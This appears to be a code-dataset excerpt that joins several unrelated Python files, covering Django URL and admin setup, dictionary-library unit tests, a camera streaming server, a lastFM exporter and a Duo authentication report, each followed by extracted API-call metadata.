path('api/', include(('rachis.apps.authentication.urls'), namespace='auth')),
path('api/', include(('rachis.apps.resource.urls'), namespace='resources')),
]
|
[
"django.urls.include"
] |
[((94, 154), 'django.urls.include', 'include', (['"""rachis.apps.authentication.urls"""'], {'namespace': '"""auth"""'}), "('rachis.apps.authentication.urls', namespace='auth')\n", (101, 154), False, 'from django.urls import path, include\n'), ((176, 235), 'django.urls.include', 'include', (['"""rachis.apps.resource.urls"""'], {'namespace': '"""resources"""'}), "('rachis.apps.resource.urls', namespace='resources')\n", (183, 235), False, 'from django.urls import path, include\n')]
|
# -*- coding: utf-8 -*-
from benedict import benedict
import unittest
class benedict_casting_test_case(unittest.TestCase):
def test__getitem__(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b['b.c']
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_cast_dict_to_benedict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bb = benedict(b)
bbd = bb.dict()
self.assertTrue(isinstance(bbd, dict))
self.assertFalse(isinstance(bbd, benedict))
self.assertEqual(d, bbd)
self.assertTrue(d is bbd)
def test_cast_benedict_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
# d1 = dict(**b)
# print(d1)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
d = dict(b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_cast_benedict_kwargs_to_dict(self):
b = benedict({
'a': 1,
'b': {
'c': {
'd': 2,
},
},
})
d = dict(**b)
self.assertTrue(isinstance(d, dict))
self.assertEqual(type(d), dict)
self.assertEqual(b, d)
self.assertFalse(b is d)
def test_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
bd = b.dict()
self.assertTrue(isinstance(bd, dict))
self.assertFalse(isinstance(bd, benedict))
self.assertTrue(d == bd)
self.assertTrue(d is bd)
def test_get(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_dict(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.get_dict('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'])
self.assertFalse(c is d['b']['c'])
def test_get_list_item(self):
d = {
'a': 1,
'b': {
'c': [
{ 'd': 2, },
{ 'e': 3, },
{ 'f': 4, },
]
},
}
b = benedict(d)
c = b.get_list_item('b.c', 1)
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
self.assertTrue(c == d['b']['c'][1])
self.assertFalse(c is d['b']['c'][1])
def test_pop(self):
d = {
'a': 1,
'b': {
'c': {
'd': 2,
},
},
}
b = benedict(d)
c = b.pop('b.c')
self.assertTrue(isinstance(c, benedict))
self.assertEqual(type(c), benedict)
with self.assertRaises(KeyError):
d['b']['c']
|
[
"benedict.benedict"
] |
[((319, 330), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (327, 330), False, 'from benedict import benedict\n'), ((733, 744), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (741, 744), False, 'from benedict import benedict\n'), ((758, 769), 'benedict.benedict', 'benedict', (['b'], {}), '(b)\n', (766, 769), False, 'from benedict import benedict\n'), ((1015, 1055), 'benedict.benedict', 'benedict', (["{'a': 1, 'b': {'c': {'d': 2}}}"], {}), "({'a': 1, 'b': {'c': {'d': 2}}})\n", (1023, 1055), False, 'from benedict import benedict\n'), ((1606, 1646), 'benedict.benedict', 'benedict', (["{'a': 1, 'b': {'c': {'d': 2}}}"], {}), "({'a': 1, 'b': {'c': {'d': 2}}})\n", (1614, 1646), False, 'from benedict import benedict\n'), ((2109, 2120), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2117, 2120), False, 'from benedict import benedict\n'), ((2491, 2502), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2499, 2502), False, 'from benedict import benedict\n'), ((2896, 2907), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (2904, 2907), False, 'from benedict import benedict\n'), ((3381, 3392), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (3389, 3392), False, 'from benedict import benedict\n'), ((3800, 3811), 'benedict.benedict', 'benedict', (['d'], {}), '(d)\n', (3808, 3811), False, 'from benedict import benedict\n')]
|
import time
from typing import Any, Dict, List
from configs import GLOBAL_QUEUE_NAMES
from nxs_libs.queue import NxsQueueType
from nxs_libs.simple_key_value_db import NxsSimpleKeyValueDbType
from nxs_types.log import NxsBackendCmodelThroughputLog, NxsBackendThroughputLog
from nxs_types.nxs_args import NxsBackendMonitorArgs
from nxs_utils.nxs_helper import (
create_queue_puller_from_args,
create_queue_pusher_from_args,
create_simple_key_value_db_from_args,
)
class NxsBasicBackendMonitor:
def __init__(self, args: NxsBackendMonitorArgs) -> None:
self.args = args
self.model_expiration_secs = 30
self.logs_puller = create_queue_puller_from_args(
args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.BACKEND_LOGS
)
self.logs_puller.set_buf_size(999)
self.kv_store = create_simple_key_value_db_from_args(
args, NxsSimpleKeyValueDbType.REDIS
)
self.logs_dict: Dict[str, Any] = {}
self.logs_ts_dict: Dict[str, float] = {}
def _process_logs(self, logs: List[NxsBackendThroughputLog]):
ts = time.time()
keys_to_remove = []
for key in self.logs_dict:
if ts - self.logs_ts_dict[key] > self.model_expiration_secs:
keys_to_remove.append(key)
for key in keys_to_remove:
self.logs_dict.pop(key)
self.logs_ts_dict.pop(key)
for log in logs:
key = log.backend_name
self.logs_dict[key] = log
self.logs_ts_dict[key] = ts
def _get_stored_logs(self) -> List[NxsBackendThroughputLog]:
logs: List[NxsBackendThroughputLog] = []
for key in self.logs_dict:
logs.append(self.logs_dict[key])
return logs
def run(self):
while True:
logs: List[NxsBackendThroughputLog] = self.logs_puller.pull()
self._process_logs(logs)
self.kv_store.set_value(
GLOBAL_QUEUE_NAMES.BACKEND_MONITOR_LOGS, self._get_stored_logs()
)
time.sleep(self.args.polling_interval_secs)
if __name__ == "__main__":
from main_processes.backend_monitor.args import parse_args
args = parse_args()
monitor = NxsBasicBackendMonitor(args)
monitor.run()
|
[
"nxs_utils.nxs_helper.create_simple_key_value_db_from_args",
"nxs_utils.nxs_helper.create_queue_puller_from_args",
"main_processes.backend_monitor.args.parse_args",
"time.sleep",
"time.time"
] |
[((2212, 2224), 'main_processes.backend_monitor.args.parse_args', 'parse_args', ([], {}), '()\n', (2222, 2224), False, 'from main_processes.backend_monitor.args import parse_args\n'), ((659, 752), 'nxs_utils.nxs_helper.create_queue_puller_from_args', 'create_queue_puller_from_args', (['args', 'NxsQueueType.REDIS', 'GLOBAL_QUEUE_NAMES.BACKEND_LOGS'], {}), '(args, NxsQueueType.REDIS, GLOBAL_QUEUE_NAMES.\n BACKEND_LOGS)\n', (688, 752), False, 'from nxs_utils.nxs_helper import create_queue_puller_from_args, create_queue_pusher_from_args, create_simple_key_value_db_from_args\n'), ((837, 910), 'nxs_utils.nxs_helper.create_simple_key_value_db_from_args', 'create_simple_key_value_db_from_args', (['args', 'NxsSimpleKeyValueDbType.REDIS'], {}), '(args, NxsSimpleKeyValueDbType.REDIS)\n', (873, 910), False, 'from nxs_utils.nxs_helper import create_queue_puller_from_args, create_queue_pusher_from_args, create_simple_key_value_db_from_args\n'), ((1107, 1118), 'time.time', 'time.time', ([], {}), '()\n', (1116, 1118), False, 'import time\n'), ((2064, 2107), 'time.sleep', 'time.sleep', (['self.args.polling_interval_secs'], {}), '(self.args.polling_interval_secs)\n', (2074, 2107), False, 'import time\n')]
|
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import unittest
from ansible.errors import AnsibleError
from ansible.errors import AnsibleFilterError
from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml
INVALID_DATA = '<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
VALID_DATA = (
'<netconf-state xmlns="urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring">'
"<schemas><schema/></schemas></netconf-state>"
)
OUTPUT = """{"netconf-state": \
{"@xmlns": "urn:ietf:params:xml:ns:yang:ietf-netconf-monitoring", "schemas": {"schema": null}}}"""
class TestFromXml(unittest.TestCase):
def setUp(self):
pass
def test_invalid_data(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "xmltodict"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn(
"Error when using plugin 'from_xml': Input Xml is not valid",
str(error.exception),
)
def test_valid_data(self):
"""Check passing valid data as per criteria"""
self.maxDiff = None
args = ["", VALID_DATA, "xmltodict"]
result = _from_xml(*args)
self.assertEqual(result, OUTPUT)
def test_args(self):
"""Check passing invalid argspec"""
# missing required arguments
args = []
kwargs = {}
with self.assertRaises(AnsibleFilterError) as error:
_from_xml(*args, **kwargs)
self.assertIn("missing required arguments: data", str(error.exception))
def test_invalid_engine(self):
"""Check passing invalid argspec"""
# missing required arguments
args = ["", INVALID_DATA, "test"]
kwargs = {}
with self.assertRaises(AnsibleError) as error:
_from_xml(*args, **kwargs)
self.assertIn("engine: test is not supported", str(error.exception))
|
[
"ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml"
] |
[((1461, 1477), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args)\n', (1470, 1477), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((1116, 1142), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (1125, 1142), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((1738, 1764), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (1747, 1764), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n'), ((2092, 2118), 'ansible_collections.ansible.utils.plugins.filter.from_xml._from_xml', '_from_xml', (['*args'], {}), '(*args, **kwargs)\n', (2101, 2118), False, 'from ansible_collections.ansible.utils.plugins.filter.from_xml import _from_xml\n')]
|
import io
import json
import os
import sys
from http.server import ThreadingHTTPServer
from mjpegserver import StreamingHandler
from threading import Condition
from threading import Thread
import basler
from utility import ePrint
"""
FrameBuffer is a synchronized buffer which gets each frame and notifies to all waiting clients.
It implements write() method to be used
"""
class FrameBuffer:
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
# New frame
with self.condition:
# write to buffer
self.buffer.seek(0)
self.buffer.write(buf)
# crop buffer to exact size
self.buffer.truncate()
# save the frame
self.frame = self.buffer.getvalue()
# notify all other threads
self.condition.notify_all()
def main():
try:
ePrint(sys.argv)
camera_id = sys.argv[1]
port = int(sys.argv[2])
ePrint("Starting MJPEG Server for camera ID: %s @port %s" % (camera_id, port))
script_path = os.path.dirname(os.path.realpath(__file__))
config_path = script_path+'/'+'config.json'
config_file = open(config_path, "r")
config = json.load(config_file)
config_file.close()
# Create frame_buffer for image data sharing
frame_buffer = FrameBuffer()
# Start camera image grabbing
camera = basler.Basler(config[camera_id], camera_id, frame_buffer)
# Start camera command handler
thread1 = Thread(target=camera.cameraCommandHandler)
thread1.start()
# Start Datastreamer to StdOut
if config[camera_id]["converter"]["OutPutToStdOut"]:
from utility import DataStreamer
streamer = DataStreamer(frame_buffer)
thread2 = Thread(target=streamer.writeToStdout)
thread2.start()
# Start MJPEG server
address = ('', port)
httpd = ThreadingHTTPServer(address, lambda *args: StreamingHandler(frame_buffer, camera_id, *args))
httpd.serve_forever()
finally:
camera.stopGrabbingImages()
thread1.join()
if config["converter"]["OutPutToStdOut"]:
thread2.join()
ePrint("Threads finished...exiting")
ePrint("Program finished")
if __name__ == '__main__':
main()
|
[
"threading.Thread",
"io.BytesIO",
"json.load",
"os.path.realpath",
"threading.Condition",
"mjpegserver.StreamingHandler",
"utility.DataStreamer",
"utility.ePrint",
"basler.Basler"
] |
[((468, 480), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (478, 480), False, 'import io\n'), ((506, 517), 'threading.Condition', 'Condition', ([], {}), '()\n', (515, 517), False, 'from threading import Condition\n'), ((953, 969), 'utility.ePrint', 'ePrint', (['sys.argv'], {}), '(sys.argv)\n', (959, 969), False, 'from utility import ePrint\n'), ((1042, 1120), 'utility.ePrint', 'ePrint', (["('Starting MJPEG Server for camera ID: %s @port %s' % (camera_id, port))"], {}), "('Starting MJPEG Server for camera ID: %s @port %s' % (camera_id, port))\n", (1048, 1120), False, 'from utility import ePrint\n'), ((1302, 1324), 'json.load', 'json.load', (['config_file'], {}), '(config_file)\n', (1311, 1324), False, 'import json\n'), ((1500, 1557), 'basler.Basler', 'basler.Basler', (['config[camera_id]', 'camera_id', 'frame_buffer'], {}), '(config[camera_id], camera_id, frame_buffer)\n', (1513, 1557), False, 'import basler\n'), ((1616, 1658), 'threading.Thread', 'Thread', ([], {'target': 'camera.cameraCommandHandler'}), '(target=camera.cameraCommandHandler)\n', (1622, 1658), False, 'from threading import Thread\n'), ((2322, 2358), 'utility.ePrint', 'ePrint', (['"""Threads finished...exiting"""'], {}), "('Threads finished...exiting')\n", (2328, 2358), False, 'from utility import ePrint\n'), ((2367, 2393), 'utility.ePrint', 'ePrint', (['"""Program finished"""'], {}), "('Program finished')\n", (2373, 2393), False, 'from utility import ePrint\n'), ((1159, 1185), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1175, 1185), False, 'import os\n'), ((1852, 1878), 'utility.DataStreamer', 'DataStreamer', (['frame_buffer'], {}), '(frame_buffer)\n', (1864, 1878), False, 'from utility import DataStreamer\n'), ((1901, 1938), 'threading.Thread', 'Thread', ([], {'target': 'streamer.writeToStdout'}), '(target=streamer.writeToStdout)\n', (1907, 1938), False, 'from threading import Thread\n'), ((2085, 2133), 'mjpegserver.StreamingHandler', 'StreamingHandler', 
(['frame_buffer', 'camera_id', '*args'], {}), '(frame_buffer, camera_id, *args)\n', (2101, 2133), False, 'from mjpegserver import StreamingHandler\n')]
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: <NAME>
# Contact: <EMAIL>
# Git: www.github.com/italogfernandes
# This project is based on: https://github.com/ronaldosena/imagens-medicas-2
# Please give the credits to ronaldo sena.
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# ------------------------------------------------------------------------------
from scipy.misc import imread
import matplotlib.image as mpimg
import scipy.ndimage as ndimage
from matlab_fspecial import fspecial
# First part
files_folder = '../../datasets/' # Caminho para a pasta onde estao as imagens
file_names = ('arteriaBMP.bmp','blood0.PNG','blood1.PNG','pe.jpg')
in_images = [imread(files_folder+image_name) for image_name in file_names ]
out_images = [None] * len(file_names)
brightness = 100
mask_sizes = (3,7,25)
kernels = []
for mask_size in mask_sizes:
kernels.append(fspecial('average',mask_size))
# for in_image in in_images:
for i in range(len(file_names)):
in_image = in_images[i]
o1 = in_image + brightness
o1[in_image > (255 - brightness)] = 255
o2 = in_image - brightness
o2[in_image < (0 + brightness)] = 0
out_images[i] = [o1, o2]
plt.figure()
plt.subplot(2,len(mask_sizes)+1,1)
plt.imshow(in_image, cmap=plt.cm.gray)
plt.title('Original')
plt.subplot(2,len(mask_sizes)+1,len(mask_sizes)+2)
plt.hist(in_image.ravel(),256,[0,256])
plt.title('Histograma original')
out_images_line = []
for j in range(len(mask_sizes)):
out_image = ndimage.uniform_filter(in_image,size=mask_sizes[j])
#out_image = ndimage.correlate(in_image,kernels[j])
out_images_line.append(out_image)
plt.subplot(2, len(mask_sizes)+1, j+2)
plt.imshow(out_image, cmap=plt.cm.gray)
plt.title('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
plt.subplot(2, len(mask_sizes)+1,j+len(mask_sizes)+3)
plt.hist(out_image.ravel(),256,[0,256])
plt.title('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))
out_images.append(out_images_line)
plt.show()
|
[
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.figure",
"matlab_fspecial.fspecial",
"scipy.ndimage.uniform_filter",
"scipy.misc.imread"
] |
[((2556, 2566), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2564, 2566), True, 'import matplotlib.pyplot as plt\n'), ((1113, 1146), 'scipy.misc.imread', 'imread', (['(files_folder + image_name)'], {}), '(files_folder + image_name)\n', (1119, 1146), False, 'from scipy.misc import imread\n'), ((1623, 1635), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1633, 1635), True, 'import matplotlib.pyplot as plt\n'), ((1688, 1726), 'matplotlib.pyplot.imshow', 'plt.imshow', (['in_image'], {'cmap': 'plt.cm.gray'}), '(in_image, cmap=plt.cm.gray)\n', (1698, 1726), True, 'import matplotlib.pyplot as plt\n'), ((1731, 1752), 'matplotlib.pyplot.title', 'plt.title', (['"""Original"""'], {}), "('Original')\n", (1740, 1752), True, 'import matplotlib.pyplot as plt\n'), ((1860, 1892), 'matplotlib.pyplot.title', 'plt.title', (['"""Histograma original"""'], {}), "('Histograma original')\n", (1869, 1892), True, 'import matplotlib.pyplot as plt\n'), ((1315, 1345), 'matlab_fspecial.fspecial', 'fspecial', (['"""average"""', 'mask_size'], {}), "('average', mask_size)\n", (1323, 1345), False, 'from matlab_fspecial import fspecial\n'), ((1976, 2028), 'scipy.ndimage.uniform_filter', 'ndimage.uniform_filter', (['in_image'], {'size': 'mask_sizes[j]'}), '(in_image, size=mask_sizes[j])\n', (1998, 2028), True, 'import scipy.ndimage as ndimage\n'), ((2186, 2225), 'matplotlib.pyplot.imshow', 'plt.imshow', (['out_image'], {'cmap': 'plt.cm.gray'}), '(out_image, cmap=plt.cm.gray)\n', (2196, 2225), True, 'import matplotlib.pyplot as plt\n'), ((2234, 2296), 'matplotlib.pyplot.title', 'plt.title', (["('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))"], {}), "('Mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))\n", (2243, 2296), True, 'import matplotlib.pyplot as plt\n'), ((2424, 2501), 'matplotlib.pyplot.title', 'plt.title', (["('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))"], {}), "('Histograma com mascara de %dx%d' % (mask_sizes[j], mask_sizes[j]))\n", 
(2433, 2501), True, 'import matplotlib.pyplot as plt\n')]
|
#!/usr/bin/env python3
'''
Export lastFM data as JSON files and merge them into a flat pandas.DataFrame.
'''
from __future__ import annotations # [PEP 563 -- Postponed Evaluation of Annotations](https://www.python.org/dev/peps/pep-0563/)
from apiWrapper import Param, getReq
from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV
import logFormat
import datetime, enlighten, json, logging, math, time
def downloadData(param:Param, download:bool=True):
'''Download user data (if {download} is True) to json files, merge them into a flat pandas.DataFrame, and write it to disk.'''
logging.info(f"{param.filePath().name.replace('.','|')}")
if download:
subMethod = param.splitMethod(lower=True)
for f in param.filePath(glob='*json'): f.unlink()
pbarManager = enlighten.get_manager()
with pbarManager.counter(unit='page', leave=False) as pbar:
while param.page <= param.nPages:
fileName = param.filePath(ext=f'.{param.page:04d}.json')
response = getReq(param=param, pbarManager=pbarManager, collapse=False)
param.page = int(response.get(subMethod).get('@attr').get('page'))
param.nPages = int(response.get(subMethod).get('@attr').get('totalPages'))
pbar.total = param.nPages # [tqdm: update total without resetting time elapsed](https://stackoverflow.com/a/58961015/13019084)
pbar.update()
param.filePath().parent.mkdir(exist_ok=True)
with open(file=fileName, mode='w') as jsonF: json.dump(obj=response, fp=jsonF)
param.page += 1
time.sleep(param.sleep)
pbarManager.stop()
DF = loadJSON(param)
df = flattenDF(param=param, DF=DF, writeToDisk=True)
if param.splitMethod() in ['TopArtists','TopAlbums','TopTracks']: writeCSV(param=param, df=df)
def exportScrobbles():
'''Fetch and process user scrobbles for the current year and for any year where exported json files are not present.'''
def earliestScrobbleYear() -> int:
'''Determine the earliest year for the user's scrobbles.'''
lastPage = int(getReq(param=Param(method='user.getInfo')).get('playcount')) - 100 # subtract 100 plays, in case some have "unknown" scrobble dates, i.e. 1970
return getReq(param=Param(method='user.getRecentTracks', lim=1, page=lastPage)).loc[0,'date'].year
param = Param(method='user.getRecentTracks', period='overall')
currentYear = datetime.datetime.now().year
for year in range(earliestScrobbleYear(), currentYear):
paramYear = Param(method='user.getRecentTracks', period=year, fr=f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')
response = getReq(param=paramYear, collapse=False, limit=1)
numPages = math.ceil(int(response.get('recenttracks').get('@attr').get('total'))/param.lim)
if numPages != len(paramYear.filePath(glob='*json')): downloadData(paramYear, download=True)
else: downloadData(paramYear, download=False)
downloadData(Param(method='user.getRecentTracks', period=currentYear, fr=f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59'))
mergeRecentTracks(param)
def main():
# downloadData(Param(method='user.getTopTracks', period='overall'))
downloadData(Param(method='user.getTopAlbums', period='overall'))
downloadData(Param(method='user.getTopArtists', period='overall'))
exportScrobbles()
if __name__== "__main__":
main()
|
[
"json.dump",
"util.mergeRecentTracks",
"util.flattenDF",
"time.sleep",
"apiWrapper.getReq",
"enlighten.get_manager",
"apiWrapper.Param",
"util.writeCSV",
"util.loadJSON",
"datetime.datetime.now"
] |
[((1716, 1731), 'util.loadJSON', 'loadJSON', (['param'], {}), '(param)\n', (1724, 1731), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((1741, 1788), 'util.flattenDF', 'flattenDF', ([], {'param': 'param', 'DF': 'DF', 'writeToDisk': '(True)'}), '(param=param, DF=DF, writeToDisk=True)\n', (1750, 1788), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((2428, 2482), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'period': '"""overall"""'}), "(method='user.getRecentTracks', period='overall')\n", (2433, 2482), False, 'from apiWrapper import Param, getReq\n'), ((3192, 3216), 'util.mergeRecentTracks', 'mergeRecentTracks', (['param'], {}), '(param)\n', (3209, 3216), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((806, 829), 'enlighten.get_manager', 'enlighten.get_manager', ([], {}), '()\n', (827, 829), False, 'import datetime, enlighten, json, logging, math, time\n'), ((1859, 1887), 'util.writeCSV', 'writeCSV', ([], {'param': 'param', 'df': 'df'}), '(param=param, df=df)\n', (1867, 1887), False, 'from util import flattenDF, loadJSON, mergeRecentTracks, writeCSV\n'), ((2501, 2524), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2522, 2524), False, 'import datetime, enlighten, json, logging, math, time\n'), ((2610, 2722), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'period': 'year', 'fr': 'f"""{year}-01-01 00:00:00"""', 'to': 'f"""{year}-12-31 23:59:59"""'}), "(method='user.getRecentTracks', period=year, fr=\n f'{year}-01-01 00:00:00', to=f'{year}-12-31 23:59:59')\n", (2615, 2722), False, 'from apiWrapper import Param, getReq\n'), ((2737, 2785), 'apiWrapper.getReq', 'getReq', ([], {'param': 'paramYear', 'collapse': '(False)', 'limit': '(1)'}), '(param=paramYear, collapse=False, limit=1)\n', (2743, 2785), False, 'from apiWrapper import Param, getReq\n'), ((3058, 3191), 'apiWrapper.Param', 'Param', ([], 
{'method': '"""user.getRecentTracks"""', 'period': 'currentYear', 'fr': 'f"""{currentYear}-01-01 00:00:00"""', 'to': 'f"""{currentYear}-12-31 23:59:59"""'}), "(method='user.getRecentTracks', period=currentYear, fr=\n f'{currentYear}-01-01 00:00:00', to=f'{currentYear}-12-31 23:59:59')\n", (3063, 3191), False, 'from apiWrapper import Param, getReq\n'), ((3319, 3370), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getTopAlbums"""', 'period': '"""overall"""'}), "(method='user.getTopAlbums', period='overall')\n", (3324, 3370), False, 'from apiWrapper import Param, getReq\n'), ((3389, 3441), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getTopArtists"""', 'period': '"""overall"""'}), "(method='user.getTopArtists', period='overall')\n", (3394, 3441), False, 'from apiWrapper import Param, getReq\n'), ((1044, 1104), 'apiWrapper.getReq', 'getReq', ([], {'param': 'param', 'pbarManager': 'pbarManager', 'collapse': '(False)'}), '(param=param, pbarManager=pbarManager, collapse=False)\n', (1050, 1104), False, 'from apiWrapper import Param, getReq\n'), ((1656, 1679), 'time.sleep', 'time.sleep', (['param.sleep'], {}), '(param.sleep)\n', (1666, 1679), False, 'import datetime, enlighten, json, logging, math, time\n'), ((1574, 1607), 'json.dump', 'json.dump', ([], {'obj': 'response', 'fp': 'jsonF'}), '(obj=response, fp=jsonF)\n', (1583, 1607), False, 'import datetime, enlighten, json, logging, math, time\n'), ((2337, 2395), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getRecentTracks"""', 'lim': '(1)', 'page': 'lastPage'}), "(method='user.getRecentTracks', lim=1, page=lastPage)\n", (2342, 2395), False, 'from apiWrapper import Param, getReq\n'), ((2179, 2207), 'apiWrapper.Param', 'Param', ([], {'method': '"""user.getInfo"""'}), "(method='user.getInfo')\n", (2184, 2207), False, 'from apiWrapper import Param, getReq\n')]
|
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import csv
import sys
import duo_client
import json
from six.moves import input
argv_iter = iter(sys.argv[1:])
def get_next_arg(prompt):
try:
return next(argv_iter)
except StopIteration:
return input(prompt)
# Configuration and information about objects to create.
admin_api = duo_client.Admin(
ikey=get_next_arg('Admin API integration key ("DI..."): '),
skey=get_next_arg("integration secret key: "),
host=get_next_arg('API hostname ("api-....duosecurity.com"): '),
)
# Retrieve log info from API:
logs = admin_api.get_authentication_log()
# Count authentications by country:
counts = dict()
for log in logs:
country = log["location"]["country"]
if country != "":
counts[country] = counts.get(country, 0) + 1
# Print CSV of country, auth count:
auths_descending = sorted(counts.items(), reverse=True)
reporter = csv.writer(sys.stdout)
print("[+] Report of auth counts by country:")
reporter.writerow(("Country", "Auth Count"))
for row in auths_descending:
reporter.writerow(
[
row[0],
row[1],
]
)
|
[
"six.moves.input",
"csv.writer"
] |
[((972, 994), 'csv.writer', 'csv.writer', (['sys.stdout'], {}), '(sys.stdout)\n', (982, 994), False, 'import csv\n'), ((320, 333), 'six.moves.input', 'input', (['prompt'], {}), '(prompt)\n', (325, 333), False, 'from six.moves import input\n')]
|
from django.contrib import admin
from .models import Post,Location
# Register your models here.
admin.site.register(Post)
admin.site.register(Location)
|
[
"django.contrib.admin.site.register"
] |
[((98, 123), 'django.contrib.admin.site.register', 'admin.site.register', (['Post'], {}), '(Post)\n', (117, 123), False, 'from django.contrib import admin\n'), ((124, 153), 'django.contrib.admin.site.register', 'admin.site.register', (['Location'], {}), '(Location)\n', (143, 153), False, 'from django.contrib import admin\n')]
|
'''
Created on 28 nov. 2021
@author: reinaqu_2
'''
import configurations
import DashboardDataExtraction as datextdash
import PublicationsQuality as pubq
from typing import TypeVar,Callable,Dict,List, Set
K = TypeVar('K')
V = TypeVar('V')
def mostrar_dict(d: Dict[str, Set[str]]):
for k,v in sorted(d.items()):
print (k, '-->', list(v))
def show_quality_bubble_plot(quality_file:str, datadash:datextdash.DashboardDataExtraction):
    """Load publication-quality data from an Excel workbook and render a bubble plot.

    :param quality_file: path of the Excel file holding the quality measures.
    :param datadash: dashboard object that stores the data and draws the plot.
    """
    pub_quality = pubq.PublicationsQuality.of_excel(quality_file, configurations.config_publ)
    datadash.set_publications_quality(pub_quality)
    # NOTE(review): if count_pairs_per_quality_measure is a method (not a
    # property) this prints the bound-method object itself -- confirm intent.
    print(pub_quality.count_pairs_per_quality_measure)
    datadash.create_bubble_quality()
def show_dict_from_multivalued_column(datadash:datextdash.DashboardDataExtraction, column_name: str):
    """Extract a dict from a multivalued column of the dashboard data and print it sorted by key."""
    mostrar_dict(datadash.create_dict_from_multivalued_column(column_name))
|
[
"PublicationsQuality.PublicationsQuality.of_excel",
"typing.TypeVar"
] |
[((210, 222), 'typing.TypeVar', 'TypeVar', (['"""K"""'], {}), "('K')\n", (217, 222), False, 'from typing import TypeVar, Callable, Dict, List, Set\n'), ((227, 239), 'typing.TypeVar', 'TypeVar', (['"""V"""'], {}), "('V')\n", (234, 239), False, 'from typing import TypeVar, Callable, Dict, List, Set\n'), ((466, 541), 'PublicationsQuality.PublicationsQuality.of_excel', 'pubq.PublicationsQuality.of_excel', (['quality_file', 'configurations.config_publ'], {}), '(quality_file, configurations.config_publ)\n', (499, 541), True, 'import PublicationsQuality as pubq\n')]
|
from zci_bio.annotations.steps import AnnotationsStep
from common_utils.file_utils import write_fasta # copy_file, link_file
_instructions = """
